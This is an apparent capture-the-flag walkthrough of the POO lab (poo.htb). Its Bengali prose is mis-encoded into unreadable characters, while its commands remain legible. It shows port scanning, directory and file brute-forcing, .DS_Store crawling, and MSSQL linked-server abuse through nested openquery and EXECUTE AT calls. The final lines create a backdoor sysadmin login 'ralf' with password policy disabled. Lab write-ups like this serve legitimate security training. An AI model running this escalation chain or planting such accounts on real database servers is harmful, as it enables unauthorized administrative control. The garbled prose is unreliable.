āĻāĻ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§ā§, āĻāĻŽāĻ°āĻž āĻā§āĻŦāĻ˛ āĻāĻāĻāĻŋ āĻŽā§āĻļāĻŋāĻ¨ āĻ¨āĻ¯āĻŧ, āĻ¸āĻžāĻāĻ āĻĨā§āĻā§ āĻāĻāĻāĻŋ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻŽāĻŋāĻ¨āĻŋ-āĻ˛ā§āĻ¯āĻžāĻŦāĻ°ā§āĻāĻ°āĻŋāĻ° āĻāĻ¤ā§āĻ¤āĻ°āĻŖ āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖ āĻāĻ°āĻŦāĨ¤
āĻŦāĻ°ā§āĻŖāĻ¨āĻžāĻ¯āĻŧ āĻŦāĻ˛āĻž āĻšāĻ¯āĻŧā§āĻā§, POO āĻāĻāĻāĻŋ āĻā§āĻ āĻ ā§āĻ¯āĻžāĻā§āĻāĻŋāĻ āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋ āĻĒāĻ°āĻŋāĻŦā§āĻļā§ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§ āĻĻāĻā§āĻˇāĻ¤āĻž āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĄāĻŋāĻāĻžāĻāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤ āĻ˛āĻā§āĻˇā§āĻ¯ āĻšāĻ˛ āĻāĻāĻāĻŋ āĻāĻĒāĻ˛āĻŦā§āĻ§ āĻšā§āĻ¸ā§āĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻĒāĻ¸ āĻāĻ°āĻž, āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻŦā§āĻĻā§āĻ§āĻŋ āĻāĻ°āĻž āĻāĻŦāĻ āĻļā§āĻˇ āĻĒāĻ°ā§āĻ¯āĻ¨ā§āĻ¤ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¯āĻŧ 5āĻāĻŋ āĻĒāĻ¤āĻžāĻāĻž āĻ¸āĻāĻā§āĻ°āĻš āĻāĻ°ā§ āĻĒā§āĻ°ā§ āĻĄā§āĻŽā§āĻ¨ā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻĒāĻ¸ āĻāĻ°āĻžāĨ¤
āĻĒāĻ°ā§āĻā§āĻˇāĻžāĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻāĻ¯ā§āĻ VPN āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§āĨ¤ āĻāĻĒāĻ¨āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻā§āĻ°ā§āĻ¤ā§āĻŦāĻĒā§āĻ°ā§āĻŖ āĻĄā§āĻāĻž āĻāĻā§ āĻāĻŽāĻ¨ āĻāĻāĻāĻŋ āĻāĻ°ā§āĻŽāĻā§āĻˇāĻŽ āĻāĻŽā§āĻĒāĻŋāĻāĻāĻžāĻ° āĻŦāĻž āĻšā§āĻ¸ā§āĻ āĻĨā§āĻā§ āĻ¸āĻāĻ¯ā§āĻ āĻ¨āĻž āĻāĻ°āĻžāĻ° āĻĒāĻ°āĻžāĻŽāĻ°ā§āĻļ āĻĻā§āĻāĻ¯āĻŧāĻž āĻšāĻ¯āĻŧ, āĻāĻžāĻ°āĻŖ āĻāĻĒāĻ¨āĻŋ āĻāĻŽāĻ¨ āĻŦā§āĻ¯āĻā§āĻ¤āĻŋāĻĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻāĻāĻŋ āĻŦā§āĻ¯āĻā§āĻ¤āĻŋāĻāĻ¤ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§ āĻ¯āĻžāĻ¨ āĻ¯āĻžāĻ°āĻž āĻ¤āĻĨā§āĻ¯ āĻ¸ā§āĻ°āĻā§āĻˇāĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻāĻŋāĻā§ āĻāĻžāĻ¨ā§āĻ¨ đ
āĻ¸āĻžāĻāĻāĻ āĻ¨āĻŋāĻ āĻ¤āĻĨā§āĻ¯
āĻ¯āĻžāĻ¤ā§ āĻāĻĒāĻ¨āĻŋ āĻ¨āĻ¤ā§āĻ¨ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§, āĻ¸āĻĢā§āĻāĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻāĻŦāĻ āĻ
āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ āĻ¤āĻĨā§āĻ¯ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻāĻžāĻ¨āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨, āĻāĻŽāĻŋ āĻ¤ā§āĻ°āĻŋ āĻāĻ°ā§āĻāĻŋ
āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻ¤āĻĨā§āĻ¯ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻļāĻŋāĻā§āĻˇāĻžāĻāĻ¤ āĻāĻĻā§āĻĻā§āĻļā§āĻ¯ā§ āĻĒā§āĻ°āĻĻāĻžāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧ. āĻāĻ āĻ¨āĻĨāĻŋāĻ° āĻ˛ā§āĻāĻ āĻāĻ āĻ¨āĻĨāĻŋāĻ° āĻ
āĻ§ā§āĻ¯āĻ¯āĻŧāĻ¨ā§āĻ° āĻĢāĻ˛ā§ āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻā§āĻāĻžāĻ¨ āĻāĻŦāĻ āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻā§āĻ˛āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻžāĻ° āĻĢāĻ˛ā§ āĻāĻžāĻ°āĻ āĻā§āĻˇāĻ¤āĻŋāĻ° āĻāĻ¨ā§āĻ¯ āĻā§āĻ¨āĻ āĻĻāĻžāĻ¯āĻŧāĻŦāĻĻā§āĻ§āĻ¤āĻž āĻā§āĻ°āĻšāĻŖ āĻāĻ°ā§āĻ¨ āĻ¨āĻžāĨ¤
āĻāĻ¨ā§āĻā§āĻ°ā§
āĻāĻ āĻļā§āĻˇ āĻā§āĻŽāĻāĻŋāĻ¤ā§ āĻĻā§āĻāĻŋ āĻŽā§āĻļāĻŋāĻ¨ āĻ°āĻ¯āĻŧā§āĻā§ āĻāĻŦāĻ āĻāĻ¤ā§ 5āĻāĻŋ āĻĒāĻ¤āĻžāĻāĻž āĻ°āĻ¯āĻŧā§āĻā§āĨ¤
āĻāĻĒāĻ˛āĻŦā§āĻ§ āĻšā§āĻ¸ā§āĻā§āĻ° āĻŦāĻŋāĻŦāĻ°āĻŖ āĻāĻŦāĻ āĻ āĻŋāĻāĻžāĻ¨āĻžāĻ āĻĻā§āĻāĻ¯āĻŧāĻž āĻāĻā§āĨ¤
āĻļā§āĻ°ā§ āĻāĻ°āĻž āĻ¯āĻžāĻ!
āĻ°āĻŋāĻāĻ¨ āĻĒāĻ¤āĻžāĻāĻž
āĻāĻ āĻŽā§āĻļāĻŋāĻ¨ā§āĻ° āĻāĻāĻāĻŋ IP āĻ āĻŋāĻāĻžāĻ¨āĻž āĻāĻā§ 10.13.38.11 āĻ¯āĻž āĻāĻŽāĻŋ /etc/hosts āĻ āĻ¯ā§āĻ āĻāĻ°āĻŋāĨ¤
10.13.38.11 poo.htb
āĻĒā§āĻ°āĻĨāĻŽ āĻ§āĻžāĻĒ āĻšāĻ˛ āĻā§āĻ˛āĻž āĻĒā§āĻ°ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻžāĨ¤ āĻ¯ā§āĻšā§āĻ¤ā§ nmap āĻĻāĻŋāĻ¯āĻŧā§ āĻ¸āĻŦ āĻĒā§āĻ°ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻ¤ā§ āĻ āĻ¨ā§āĻ āĻ¸āĻŽāĻ¯āĻŧ āĻ˛āĻžāĻā§ āĻ¤āĻžāĻ āĻāĻŽāĻŋ āĻĒā§āĻ°āĻĨāĻŽā§ masscan āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻ°āĻŦāĨ¤ āĻāĻŽāĻ°āĻž 0pps āĻ tun500 āĻāĻ¨ā§āĻāĻžāĻ°āĻĢā§āĻ¸ āĻĨā§āĻā§ āĻ¸āĻŽāĻ¸ā§āĻ¤ TCP āĻāĻŦāĻ UDP āĻĒā§āĻ°ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻŋāĨ¤
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
āĻāĻāĻ¨, āĻĒā§āĻ°ā§āĻāĻā§āĻ˛āĻŋāĻ¤ā§ āĻāĻžāĻ˛āĻžāĻ¨ā§ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻžāĻā§āĻ˛āĻŋ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻāĻ°āĻ āĻŦāĻŋāĻļāĻĻ āĻ¤āĻĨā§āĻ¯ āĻĒā§āĻ¤ā§, āĻāĻ¸ā§āĻ¨ -A āĻŦāĻŋāĻāĻ˛ā§āĻĒāĻāĻŋ āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻāĻāĻŋ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻŋā§ˇ
nmap -A poo.htb -p80,1433
āĻāĻāĻāĻžāĻŦā§, āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻā§ IIS āĻāĻŦāĻ MSSQL āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻāĻ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§, āĻāĻŽāĻ°āĻž āĻĄā§āĻŽā§āĻāĻ¨ āĻāĻŦāĻ āĻāĻŽā§āĻĒāĻŋāĻāĻāĻžāĻ°ā§āĻ° āĻāĻ¸āĻ˛ DNS āĻ¨āĻžāĻŽāĻāĻŋ āĻā§āĻāĻā§ āĻŦā§āĻ° āĻāĻ°āĻŦāĨ¤ āĻāĻ¯āĻŧā§āĻŦ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§, āĻāĻŽāĻ°āĻž IIS āĻšā§āĻŽ āĻĒā§āĻ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¸ā§āĻŦāĻžāĻāĻ¤ āĻāĻžāĻ¨āĻžāĻāĨ¤
āĻāĻ° āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋ āĻāĻĒāĻ° āĻĒā§āĻ¨āĻ°āĻžāĻŦā§āĻ¤ā§āĻ¤āĻŋ āĻāĻ°āĻž āĻ¯āĻžāĻ. āĻāĻŽāĻŋ āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻŦāĻžāĻ¸ā§āĻāĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŋāĨ¤ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ°ā§ āĻāĻŽāĻ°āĻž āĻ¸ā§āĻā§āĻ°ā§āĻŽā§āĻ° āĻ¸āĻāĻā§āĻ¯āĻž āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻ°āĻŋ 128 (-t), URL (-u), āĻ
āĻāĻŋāĻ§āĻžāĻ¨ (-w) āĻāĻŦāĻ āĻāĻā§āĻ¸āĻā§āĻ¨āĻļāĻ¨āĻā§āĻ˛āĻŋ āĻ¯āĻž āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻā§āĻ°āĻšā§āĻ° (-x)āĨ¤
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
āĻāĻāĻāĻžāĻŦā§, āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻā§ /admin āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ° āĻāĻ¨ā§āĻ¯ HTTP āĻĒā§āĻ°āĻŽāĻžāĻŖā§āĻāĻ°āĻŖ āĻ°āĻ¯āĻŧā§āĻā§, āĻ¸ā§āĻāĻ¸āĻžāĻĨā§ .DS_Store āĻĄā§āĻ¸ā§āĻāĻāĻĒ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻ¸ā§āĻā§āĻ°ā§āĻ āĻĢāĻžāĻāĻ˛ āĻāĻĒāĻ˛āĻŦā§āĻ§āĨ¤ .DS_Store āĻšāĻ˛ āĻāĻŽāĻ¨ āĻĢāĻžāĻāĻ˛ āĻ¯āĻž āĻāĻāĻāĻŋ āĻĢā§āĻ˛ā§āĻĄāĻžāĻ°ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻ¸ā§āĻāĻŋāĻāĻ¸ āĻ¸āĻāĻ°āĻā§āĻˇāĻŖ āĻāĻ°ā§, āĻ¯ā§āĻŽāĻ¨ āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ¤āĻžāĻ˛āĻŋāĻāĻž, āĻāĻāĻāĻ¨ āĻ
āĻŦāĻ¸ā§āĻĨāĻžāĻ¨, āĻ¨āĻŋāĻ°ā§āĻŦāĻžāĻāĻŋāĻ¤ āĻŦā§āĻ¯āĻžāĻāĻā§āĻ°āĻžāĻāĻ¨ā§āĻĄ āĻāĻŽā§āĻāĨ¤ āĻāĻ āĻ§āĻ°āĻ¨ā§āĻ° āĻāĻāĻāĻŋ āĻĢāĻžāĻāĻ˛ āĻāĻ¯āĻŧā§āĻŦ āĻĄā§āĻā§āĻ˛āĻĒāĻžāĻ°āĻĻā§āĻ° āĻāĻ¯āĻŧā§āĻŦ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ¤ā§ āĻļā§āĻˇ āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻāĻāĻāĻžāĻŦā§, āĻāĻŽāĻ°āĻž āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻ¤āĻĨā§āĻ¯ āĻĒā§āĻ¤ā§ āĻĒāĻžāĻ°āĻŋāĨ¤ āĻāĻ āĻāĻ¨ā§āĻ¯ āĻāĻĒāĻ¨āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨
python3 dsstore_crawler.py -i http://poo.htb/
āĻāĻŽāĻ°āĻž āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻĒāĻžāĻāĨ¤ āĻāĻāĻžāĻ¨ā§ āĻ¸āĻŦāĻā§āĻ¯āĻŧā§ āĻāĻāĻ°ā§āĻˇāĻŖā§āĻ¯āĻŧ āĻŦāĻŋāĻˇāĻ¯āĻŧ āĻšāĻ˛ /dev āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋ, āĻ¯ā§āĻāĻžāĻ¨ āĻĨā§āĻā§ āĻāĻŽāĻ°āĻž āĻĻā§āĻāĻŋ āĻļāĻžāĻāĻžāĻ¯āĻŧ āĻ¸ā§āĻ°ā§āĻ¸ āĻāĻŦāĻ db āĻĢāĻžāĻāĻ˛ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ°āĻŋāĨ¤ āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻāĻŽāĻ°āĻž āĻĢāĻžāĻāĻ˛ āĻāĻŦāĻ āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ° āĻ¨āĻžāĻŽā§āĻ° āĻĒā§āĻ°āĻĨāĻŽ 6āĻāĻŋ āĻ
āĻā§āĻˇāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŋ āĻ¯āĻĻāĻŋ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻžāĻāĻŋ IIS ShortName-āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻā§āĻāĻāĻŋāĻĒā§āĻ°ā§āĻŖ āĻšāĻ¯āĻŧāĨ¤ āĻāĻĒāĻ¨āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻ āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨
āĻāĻŦāĻ āĻāĻŽāĻ°āĻž āĻāĻāĻāĻŋ āĻĒāĻžāĻ ā§āĻ¯ āĻĢāĻžāĻāĻ˛ āĻā§āĻāĻā§ āĻĒāĻžāĻ āĻ¯āĻž "poo_co" āĻĻāĻŋāĻ¯āĻŧā§ āĻļā§āĻ°ā§ āĻšāĻ¯āĻŧāĨ¤ āĻāĻ°āĻĒāĻ°ā§ āĻā§ āĻāĻ°āĻ¤ā§ āĻšāĻŦā§ āĻ¤āĻž āĻ¨āĻž āĻā§āĻ¨ā§, āĻāĻŽāĻŋ āĻā§āĻŦāĻ˛āĻŽāĻžāĻ¤ā§āĻ° "co" āĻĻāĻŋāĻ¯āĻŧā§ āĻļā§āĻ°ā§ āĻšāĻāĻ¯āĻŧāĻž āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻļāĻŦā§āĻĻ āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ° āĻ
āĻāĻŋāĻ§āĻžāĻ¨ āĻĨā§āĻā§ āĻ¨āĻŋāĻ°ā§āĻŦāĻžāĻāĻ¨ āĻāĻ°ā§āĻāĻŋāĨ¤
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
āĻāĻŦāĻ wfuzz āĻ¸āĻā§āĻā§ āĻĒā§āĻ¨āĻ°āĻžāĻŦā§āĻ¤ā§āĻ¤āĻŋ.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
āĻāĻŦāĻ āĻ¸āĻ āĻŋāĻ āĻļāĻŦā§āĻĻ āĻā§āĻāĻā§! āĻāĻŽāĻ°āĻž āĻāĻ āĻĢāĻžāĻāĻ˛āĻāĻŋ āĻĻā§āĻāĻŋ, āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°āĻā§āĻ˛āĻŋ āĻ¸āĻāĻ°āĻā§āĻˇāĻŖ āĻāĻ°āĻŋ (DBNAME āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻŦāĻŋāĻāĻžāĻ° āĻāĻ°ā§, āĻ¸ā§āĻā§āĻ˛āĻŋ MSSQL āĻĨā§āĻā§)āĨ¤
āĻāĻŽāĻ°āĻž āĻĒāĻ¤āĻžāĻāĻž āĻšāĻ¸ā§āĻ¤āĻžāĻ¨ā§āĻ¤āĻ° āĻāĻ°āĻŋ, āĻāĻŦāĻ āĻāĻŽāĻ°āĻž 20% āĻ
āĻā§āĻ°āĻ¸āĻ° āĻšāĻāĨ¤
āĻšā§āĻš āĻĒāĻ¤āĻžāĻāĻž
āĻāĻŽāĻ°āĻž MSSQL āĻāĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻāĻ¯ā§āĻ āĻāĻ°āĻŋ, āĻāĻŽāĻŋ DBeaver āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŋāĨ¤
āĻāĻŽāĻ°āĻž āĻāĻ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§ āĻāĻāĻ°ā§āĻˇāĻŖā§āĻ¯āĻŧ āĻāĻŋāĻā§ āĻā§āĻāĻā§ āĻĒāĻžāĻ āĻ¨āĻž, āĻāĻ¸ā§āĻ¨ āĻāĻāĻāĻŋ āĻāĻ¸āĻāĻŋāĻāĻāĻ˛ āĻāĻĄāĻŋāĻāĻ° āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻŋ āĻāĻŦāĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ°āĻž āĻā§ āĻ¤āĻž āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻŋāĨ¤
SELECT name FROM master..syslogins;
āĻāĻŽāĻ°āĻž āĻĻā§āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻāĻā§. āĻāĻŽāĻžāĻĻā§āĻ° āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻā§āĻ āĻāĻ°āĻž āĻ¯āĻžāĻ.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
āĻ¸ā§āĻ¤āĻ°āĻžāĻ, āĻā§āĻ¨ āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻāĻā§. āĻāĻ˛ā§āĻ¨ āĻ˛āĻŋāĻā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĻā§āĻā§āĻ¨, āĻāĻŽāĻŋ āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤ āĻāĻ āĻā§āĻļāĻ˛ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻ˛āĻŋāĻā§āĻāĻŋ
SELECT * FROM master..sysservers;
āĻ¤āĻžāĻ āĻāĻŽāĻ°āĻž āĻ
āĻ¨ā§āĻ¯ SQL āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻā§āĻāĻā§. Openquery() āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§ āĻāĻŽāĻžāĻ¨ā§āĻĄā§āĻ° āĻāĻā§āĻ¸āĻŋāĻāĻŋāĻāĻļāĻ¨ āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻž āĻ¯āĻžāĻāĨ¤
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
āĻāĻŦāĻ āĻāĻŽāĻ°āĻž āĻāĻŽāĻ¨āĻāĻŋ āĻāĻāĻāĻŋ āĻā§āĻ¯ā§āĻ¯āĻŧāĻžāĻ°ā§ āĻāĻžāĻ āĻ¨āĻŋāĻ°ā§āĻŽāĻžāĻŖ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
āĻāĻ¸āĻ˛ āĻŦāĻŋāĻˇāĻ¯āĻŧāĻāĻŋ āĻšāĻ˛ āĻ¯ā§ āĻāĻŽāĻ°āĻž āĻ¯āĻāĻ¨ āĻāĻāĻāĻŋ āĻ˛āĻŋāĻā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§ āĻāĻāĻāĻŋ āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻāĻ°āĻŋ, āĻ¤āĻāĻ¨ āĻ āĻ¨ā§āĻ°ā§āĻ§āĻāĻŋ āĻ āĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻĒā§āĻ°ā§āĻā§āĻˇāĻžāĻĒāĻā§ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧ! āĻāĻ¸ā§āĻ¨ āĻāĻŽāĻ°āĻž āĻ˛āĻŋāĻā§āĻ āĻāĻ°āĻž āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§ āĻā§āĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻĒā§āĻ°āĻ¸āĻā§āĻ āĻāĻžāĻ˛āĻžāĻā§āĻāĻŋ āĻ¤āĻž āĻĻā§āĻāĻŋāĨ¤
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
āĻāĻŦāĻ āĻāĻāĻ¨ āĻĻā§āĻāĻž āĻ¯āĻžāĻ āĻāĻŽāĻžāĻĻā§āĻ° āĻ˛āĻŋāĻā§āĻ āĻāĻ°āĻž āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĨā§āĻā§ āĻ
āĻ¨ā§āĻ°ā§āĻ§āĻāĻŋ āĻā§ āĻĒā§āĻ°ā§āĻā§āĻˇāĻžāĻĒāĻā§ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻšāĻ¯āĻŧ!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
āĻ¸ā§āĻ¤āĻ°āĻžāĻ, āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻĄāĻŋāĻŦāĻŋāĻ āĻĒā§āĻ°āĻ¸āĻā§āĻ āĻ¯āĻžāĻ¤ā§ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻĨāĻžāĻāĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻāĻāĻāĻŋ āĻ˛āĻŋāĻā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĨā§āĻā§ āĻāĻāĻāĻŋ āĻ
āĻ¨ā§āĻ°ā§āĻ§ā§āĻ° āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻž āĻ¯āĻžāĻ.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
āĻāĻĒāĻ¨āĻŋ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨, āĻāĻŽāĻ°āĻž āĻ¸āĻŦ āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻāĻā§! āĻāĻ¸ā§āĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻĄāĻŽāĻŋāĻ¨ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻŋ āĻāĻāĻžāĻŦā§āĨ¤ āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻ¤āĻžāĻ°āĻž āĻāĻĒā§āĻ¨āĻā§āĻ¯āĻŧā§āĻ°āĻŋāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻ¤āĻžāĻĻā§āĻ° āĻ
āĻ¨ā§āĻŽāĻ¤āĻŋ āĻĻā§āĻ¯āĻŧ āĻ¨āĻž, āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻāĻŋ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻž āĻ¯āĻžāĻāĨ¤
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
